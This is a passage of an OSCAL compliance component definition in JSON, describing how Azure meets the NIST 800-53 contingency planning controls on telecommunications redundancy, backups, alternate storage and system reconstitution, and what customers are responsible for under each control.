the cloud environment, there is no priority order because there are different teams to bring each specific component back online in the Recovery Time Objectives (RTOs) defined for each service. Azure can define its own routing priority based on Property availability requirements and emergency purposes._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7d236627-0756-4038-8523-e5bf62fa9a9d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-042"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.1_smt.b","by-components":[{"uuid":"c4d2595d-4d63-4b5d-8add-0c4859b0904d","export":{"provided":[{"uuid":"8cd43acc-2e3d-4a12-8009-69c78dd261c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-042"}],"description":"Network routing for Azure datacenters is proprietary, and therefore a Service Priority setting for emergency purposes is not required. Azure is responsible for defining its own routing priority based on property availability requirements and emergency purposes. In the cloud environment, there is no priority order because there are different teams to bring each specific component back online in the Recovery Time Objectives (RTOs) defined for each service. Azure can define its own routing priority based on Property availability requirements and emergency purposes._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"011f8921-6436-4931-8c05-44dae17b8da2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.2","statements":[{"uuid":"287c2042-c140-4418-bcd7-9dfabc5df387","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-043"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.2_smt","by-components":[{"uuid":"fcd0a7c6-268e-41a7-938b-e3fcb890570f","export":{"provided":[{"uuid":"038ab551-cbf0-483c-8249-5fdedac7dfd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-043"}],"description":"Azure mitigates the risk of single points of failures with telecommunication links by requiring each Azure datacenter to have at least two (2) diverse fiber paths. Microsoft maintains its own fiber network whose purpose is to exclusively support Microsoft properties, acting as a global fiber backbone comparable to multiple ISPs. Azure contracts with multiple carriers to provide field service maintenance in the event of faults, defects, or failures. The service level objective with the carriers for on-demand maintenance and critical time to repair is twenty-four (24) hours._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e70134e3-2d1d-4f3f-bc53-7885ec1c096d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.3","statements":[{"uuid":"95747048-6955-4e84-8840-fa136ca9f1f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-044"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.3_smt","by-components":[{"uuid":"bcd414e0-dcd1-425d-adf0-f3ad8cd200e2","export":{"provided":[{"uuid":"af84de17-880d-49b4-962c-1b0b8619ff2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-044"}],"description":"Azure mitigates the risk of single points of failures with telecommunication links by requiring each Azure datacenter to have at least two (2) separate fiber paths. The redundant communication links are established following disparate paths through the Microsoft fiber network. This is a continuously operational solution managed by Azure._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5e9a9e17-c605-454c-a501-b3183435dfad","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-8.4","statements":[{"uuid":"17e67d9f-ab06-49c1-bb31-c94ff69eb9cb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-045"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.a","by-components":[{"uuid":"8510129f-cd6c-471a-a9df-be6528ccc1bf","export":{"provided":[{"uuid":"85b062ac-7930-411d-8e10-e6df77081ddb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-045"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"cb5349a6-0d89-429e-9c64-55b9b467580c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-046"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.b","by-components":[{"uuid":"3df9a5ee-8446-47af-a237-a49885bfab45","export":{"provided":[{"uuid":"9b17b1cb-0e38-4ef8-8a30-1ac29703c26c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-046"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"cbb92efe-7b62-4819-ad4d-bc8ed1822c6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-047"},{"name":"control-origination","value":"system-specific"}],"statement-id":"cp-8.4_smt.c","by-components":[{"uuid":"0b216d92-f005-4626-a80a-4d6f84d044b2","export":{"provided":[{"uuid":"dc909b9a-119c-4301-ad79-67bb071882f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-047"}],"description":"Azure does not rely on contingency plans for individual ISPs to maintain telecommunications. Microsoft implements diverse fiber routes that automatically transfer transmissions during outages. In addition, Microsoft has contracts and SLAs to ensure timely remediation of any issues._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"ab08471e-1b52-4444-9181-d5322e830b9d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9","statements":[{"uuid":"67c6123a-60a3-4dc2-ba0c-d3930919c5fd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.a","by-components":[{"uuid":"cd1dc602-5bd0-4085-80c6-5dad5e721885","export":{"provided":[{"uuid":"e879e119-1539-48bd-ba2f-50d947bc6209","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"}],"description":"For user-level information stored in Azure Storage, data is synchronously replicated locally using Locally Redundant Storage (LRS), which provides redundancy equivalent to three copies. In addition, data is asynchronously replicated to a separate datacenter in the zone or to a remote region for accounts which have configured Zone-Redundant Storage (ZRS), Geo-Redundant Storage (GRS), or Read-Access Geo-Redundant Storage (RA-GRS). The backups sent to Azure Storage are encrypted using Federal Information Processing Standards (FIPS) 140-2 compliant AES 256-bit encryption. There are three types of backups - Customer Machine, Disk Pod, and Tape. For Customer Machine and Disk Pod backups, the data is tied together in a location and retained for seven (7) days. Disk Pods back up to Blob storage, in which there are two accounts, ensuring that data is backed up into two accounts in different regions. For tape backup, the Data Protection Services (DPS) policies and procedures describe the roles, responsibilities, and services for the backup standards, retention policies, monitoring, and reports available to customers. All information backed up and stored uses the Data Type Classification according to the Corporate, External and Legal Affairs (CELA) Data Classification. Service teams are required to identify the Data Type Classification that in turn drives the appropriate retention and storage policy assigned. The default settings include a full backup once a week and a nightly differential backup. If the backup schedule needs changing based on customer requirements, a workflow ticket is opened requesting the change. The ticket is reviewed and approved by DPS prior to instituting the change. Backup tapes are moved to an off-site facility for long term storage. The scalar tape backup library, encryption device, and servers are in each applicable datacenter. The secure offsite backup process consists of the following: * Off-site containers are stored within the datacenter. * The containers are loaded within the datacenter by authorized personnel. * All tapes are placed inside the containers for transport. * Containers are locked by authorized personnel. * CommVault Simpana Software is used to track the tape numbers through a vault report. Along with the CommVault Simpana vault report, a workflow ticket is created to track the tapes, their transport, and the personnel involved. The tracking is to ensure location of the tapes in the event a recovery is requested. * The off-site vendor retrieves the containers according to a schedule specified by DPS. * The locked containers are stored within the datacenter until an off-site vendor representative can retrieve the tape containers. * When the off-site vendor picks up the tape containers, they are not allowed to enter any datacenter, as mandated by security. The tape containers are brought to the lobby for the exchange. * Authorized personnel who handle the tapes are required to have an authorization account with the off-site vendor. This account includes a unique account number that is tracked by the off-site vendor when tapes are exchanged. * If tapes need to be retrieved for recovery purposes, authorized personnel can request the tape from off-site storage. All recovery requests are initiated by the customer by opening a workflow ticket. This ticket allows tracking of the entire recovery process. Expired tapes are tracked by vaulting and the off-site vendor. tapes are returned to the datacenter on the day of expiration."}],"responsibilities":[{"uuid":"ea905c6f-8269-4a8c-a773-939d6959c687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-048"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of user-level information in customer-deployed resources at a frequency consistent with customer-defined RTO's and RPO's. Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention.","provided-uuid":"e879e119-1539-48bd-ba2f-50d947bc6209"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4990d154-321d-4dca-9607-38e01c278bfc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.b","by-components":[{"uuid":"afdf78ed-3eda-422a-8529-1e7227f4c004","export":{"provided":[{"uuid":"d8a5c352-2218-4ae2-943a-a73e5165d685","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"}],"description":"System-level information is backed up using Azure Storage continuous replication detailed above. System-level information, defined as system-state information, operating system and application software, and licenses, is maintained in a variety of ways, but are backed by Azure Storage, which utilizes LRS, ZRS, GRS. Server, network device, and service code is maintained in Azure DevOps, which is backed up and redundant. Azure DevOps uses Azure Storage as the primary repository for service metadata and data. For additional information on DevOps, please see the link below: <https://docs.microsoft.com/en-us/azure/devops/organizations/security/data-protection?view=azure-devops#data-availability>"}],"responsibilities":[{"uuid":"a61f0738-4e24-417a-985c-f7164a73d19f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-049"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of system-level information in customer-deployed resources at a frequency consistent with customer-defined RTO's and RPO's. Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention.","provided-uuid":"d8a5c352-2218-4ae2-943a-a73e5165d685"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f9832c7-ff42-4055-8f72-db38ffd469f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.c","by-components":[{"uuid":"6c9800b0-c4b0-4e31-a10c-582538787204","export":{"provided":[{"uuid":"d4f0b66c-b41d-4467-ad3c-77da32ee2a58","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"}],"description":"Information system documentation and security-related documentation are stored on SharePoint. SharePoint backups are managed by Core Services Engineering and Operations (CSEO). Backup frequency is based on requirements defined by the BIA."}],"responsibilities":[{"uuid":"cbb081fc-f5e5-4134-a4ca-d498c2a0d442","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-050"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting backups of system documentation information in customer-deployed resources at a frequency consistent with customer-defined RTO's and RPO's. Note: if the customer configures Azure backup services appropriately, Azure can support data loss prevention","provided-uuid":"d4f0b66c-b41d-4467-ad3c-77da32ee2a58"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b8862a74-687e-494f-af3b-aff23a49d39b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9_smt.d","by-components":[{"uuid":"3615a7c8-0922-49b6-a787-552b2e6b8154","export":{"provided":[{"uuid":"60b71124-701a-4428-90d5-fc38bec9d8c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"}],"description":"Azure protects the confidentiality and integrity of all information in accordance with Federal Information Processing Standards (FIPS) 140-2 primarily through the automatic encryption of data uploaded to Azure Storage. In addition, communications between the Azure service offerings are configured to require Federal Information Processing Standards (FIPS) 140-2 compliant TLS 1.2/1.3. As part of the drive to ensure that Microsoft is only using cryptographically secure protocol versions, all teams within Azure are provided guidance to deprecate older protocols and ciphers. Service Teams are only allowed to leverage TLS 1.2/1.3 and higher protocols for both incoming and outgoing connections. Azure leverages Key Performance Indicator (KPI) alerting system to ensure service teams are only leveraging TLS 1.2/1.3 and higher protocols. The KPIs are alerted to Azure service and leadership teams for actions. Azure enforces key communications between Azure internal components to be protected with self-signed SSL certificates."}],"responsibilities":[{"uuid":"99d1240b-276b-4ddc-9ba1-060f5ab9b9ce","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-051"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for protecting the confidentiality, integrity, and availability (CIA) of customer-controlled backup data. Note: if the customer configures Azure backup services appropriately, Azure can support the protection of backup data.","provided-uuid":"60b71124-701a-4428-90d5-fc38bec9d8c4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"47fc4d5d-aa8a-44ae-b8d3-27d0bda9a889","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.1","statements":[{"uuid":"8b403495-5045-4ce5-ac15-17a2ad6dc562","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.1_smt","by-components":[{"uuid":"1955af72-d15f-4d90-9368-253290c85f0e","export":{"provided":[{"uuid":"1d4dbceb-05c3-4046-a31d-e1dbf433aff6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"}],"description":"Azure monitors all backups of the system and the customer images on a continuous basis using system-generated alerts which notify the Azure service teams of any failed or incomplete backups. Azure Storage automatically addresses backup issues as they arise. If a backup continuously fails, Azure creates an IcM incident ticket to track and resolve the issue. In addition to system-generated alerts, restoration tests of customer-requested restores are performed using the BCDR Program in the Azure Global Portal. The integrity of data is automatically confirmed upon completion of the backup. The restoration tests are captured and stored in the BCDR Program in the Azure Global Portal to generate reports and perform root-cause analysis, as needed._x000D_ _x000D_ In addition, Azure can test backups for information integrity by request from the customer. A workflow ticket must be submitted by the customer to initiate the request to test backups._x000D_ _x000D_"}],"responsibilities":[{"uuid":"58ee75c4-e4f4-46c0-ac8f-53ffc5ba76e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-052"}],"description":"The customer is responsible for backing up customer data and applications. The customer is also responsible for testing those backups. Additionally, as detailed below, the customer is responsible for requesting a test of the backup of their image as systemically created by the Microsoft Azure DPS team.","provided-uuid":"1d4dbceb-05c3-4046-a31d-e1dbf433aff6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5d17bdc8-ec31-4d53-824c-a04a804ebdb6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.2","statements":[{"uuid":"830e1180-d351-4e39-98e5-0e0dd3c7393c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.2_smt","by-components":[{"uuid":"5de48b82-e447-4564-945f-00abfe49d2de","export":{"provided":[{"uuid":"5d662a1c-c298-4a14-9c17-cedd248d28c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"}],"description":"The nature of functional business continuity and disaster recovery (BCDR) testing ensures that the redundancy built into the annual BCDR service team testing is fully addressed. This redundancy includes using actual backup information in the form of redundant processing being tested._x000D_ _x000D_"}],"responsibilities":[{"uuid":"cf20fb43-9513-4dfc-b516-c292fbe9d739","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-053"}],"description":"The customer is responsible for testing backup information. Azure can support the testing of backup information if the customer configures Azure backup services appropriately.","provided-uuid":"5d662a1c-c298-4a14-9c17-cedd248d28c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"757d3967-4c25-488c-872d-3824701bd6c2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.3","statements":[{"uuid":"9da0b786-3337-4980-bdb7-332b6eb2e3a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.3_smt","by-components":[{"uuid":"bf267d6b-75e1-445f-b721-3a74b03f11b5","export":{"provided":[{"uuid":"e93381bd-5550-40a1-a194-dfb3c90496b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"}],"description":"All Azure server, network device, and service code is backed up in Azure DevOps. Multiple backups exist in geo-diverse locations. All Azure datacenters can be used as alternate processing sites, and each site has the necessary agreements in place to transfer and resume services logically without equipment transfer. Azure service teams determine recovery objectives following the Business Impact Analysis (BIA) process and services are designed and tested to meet objectives, following the Azure Business Continuity Management (BCM) process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"bc1e94b1-35cf-487a-8276-4e0a2a0b8c78","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-054"}],"description":"The customer is responsible for separately storing backup information (e.g., separate facility or fire-rated container that is not collocated). Note: if the customer configures Microsoft Azure backup services appropriately, Azure can support the protection of backup data.","provided-uuid":"e93381bd-5550-40a1-a194-dfb3c90496b5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41557908-26a3-491e-8fbf-1e66fb9fde2d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.5","statements":[{"uuid":"ee9dc4cb-2855-49c3-922b-19cb4722018f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.5_smt","by-components":[{"uuid":"8eaa132d-fd5d-4b47-a69a-47039f71941a","export":{"provided":[{"uuid":"20d1a3c5-fec4-4e14-a3de-d212f2123077","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"}],"description":"Azure establishes alternate storage sites at geographically distributed Azure datacenters. Data durability is obtained by synchronously replicating data across different databases in the same datacenter and across multiple datacenters. Disaster recovery is achieved by asynchronous replication to a datacenter in a different geographical region. Azure datacenters are redundant and services are mirrored in geographically redundant datacenters. All sites are active and both sites in a redundant pair contain the backed-up data._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f4212825-3565-47d1-9594-2bf50c5d5c05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-055"}],"description":"The customer is responsible for transferring backup information to an alternate storage site. Azure can support the storage of backup data if the customer configures Microsoft Azure backup services appropriately. Microsoft Azure automatically copies the backups of the customer data to the storage site within the same datacenter. These backups are automatically geo-replicated to the alternative storage site in different geographic regions. If the datacenter hosting the customer data fails, the customer can utilize the Microsoft Azure Management Portal or programmatic API to restore their data from the geo-replicated backup to any geographic region of their choice. Additional information about how customers can restore data can be found here: https://docs.microsoft.com/en-us/azure/sql-database/sql-database-recovery-using-backups. In the case of failure at the customer's primary datacenter, the customer is responsible for restoring their data from backups to an alternative datacenter.","provided-uuid":"20d1a3c5-fec4-4e14-a3de-d212f2123077"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"286c43c7-8c49-45b5-ba7f-66265a81ab09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-9.8","statements":[{"uuid":"372c9d75-79dd-4963-a81f-06d76c6e8cab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-9.8_smt","by-components":[{"uuid":"fa20fae2-d475-443b-9f78-239d400a5bfb","export":{"provided":[{"uuid":"7718d46c-0038-4e27-b6bb-1b29f83056e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"}],"description":"Azure protects the confidentiality and integrity of all information in accordance with Federal Information Processing Standards (FIPS) 140-2 primarily through the automatic encryption of data uploaded to Azure Storage. In addition, communications between the Azure service offerings are configured to require Federal Information Processing Standards (FIPS) 140-2 compliant TLS 1.2/1.3. As part of the drive to ensure that Microsoft is only using cryptographically secure protocol versions, all teams within Azure are provided guidance to deprecate older protocols and ciphers. Service Teams are only allowed to leverage TLS 1.2/1.3 and higher protocols for both incoming and outgoing connections. Azure leverages Key Performance Indicator (KPI) alerting system to ensure service teams are only leveraging TLS 1.2/1.3 and higher protocols. The KPIs are alerted to Azure service and leadership teams for actions. Azure enforces key communications between Azure internal components to be protected with self-signed SSL certificates."}],"responsibilities":[{"uuid":"a08fdd38-04e1-4412-9e72-4c79b3073bc9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-056"}],"description":"The customer is responsible for implementing cryptographic mechanisms to prevent unauthorized disclosure and modification of defied backup information housed in customer-deployed resources.","provided-uuid":"7718d46c-0038-4e27-b6bb-1b29f83056e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"41ce8d83-332f-48c9-bf27-e0320b9c9b71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10","statements":[{"uuid":"3a594b63-cd14-49cd-af58-231c120d978e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10_smt","by-components":[{"uuid":"579f33c9-42d5-41c7-b197-82a39e908d6c","export":{"provided":[{"uuid":"a4315736-64be-4b54-81d3-14966d3a9534","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"}],"description":"All services are designed to be as redundant as needed by their region recovery classification. Because of this redundancy, the main recovery and reconstitution actions would take place at the damaged datacenter. Following an assessment of the damage to the datacenter, Azure plans a date for relocation of services using a phased approach. Azure prepares a schedule detailing when particular services are to relocate back to the rebuilt datacenter. Some key factors that are considered when scheduling the move are: * Ensuring the necessary core platforms and communications links are in place before restoration of the individual service teams. * Ensuring the supported tools are in place to support restoration. * Where different services are interdependent (e.g., data is passed to/from the services), restoring them to a consistent point in time and relocating them together. A detailed checklist for recovery and reconstitution of the datacenter can be found in the Datacenter Business Resilience Plan (DC BRP). Each datacenter has its own unique DC BRP."}],"responsibilities":[{"uuid":"9759be78-08f9-48af-b462-6f7e8ccb375a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-057"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for the recovery and reconstitution of customer-deployed resources after a disruption, compromise, or failure. Note: if the customer configures Azure backup and/or alternate site processing services appropriately, Azure can support the continued operation of customer-deployed resources.","provided-uuid":"a4315736-64be-4b54-81d3-14966d3a9534"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7dd5a0ef-9fa5-409e-bfb6-40bf2cb8683f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10.2","statements":[{"uuid":"1705d105-1e8b-461d-9486-5c173ff6d7fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10.2_smt","by-components":[{"uuid":"8bc61f3d-28d6-43a1-96f4-e98bdb8df263","export":{"provided":[{"uuid":"eb27c1db-5bac-412d-a84c-58731e4c8758","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"}],"description":"Currently there are no transaction-based systems in the Azure environment. The primary and alternate sites are operational, management, and technical mirrors. Therefore, the need to recover and reconstitute information systems during significant contingency events is eliminated. Instead of using transaction journaling, Azure uses live replicated databases. MySQL uses transaction journaling while Microsoft SQL uses transaction logs. Transaction 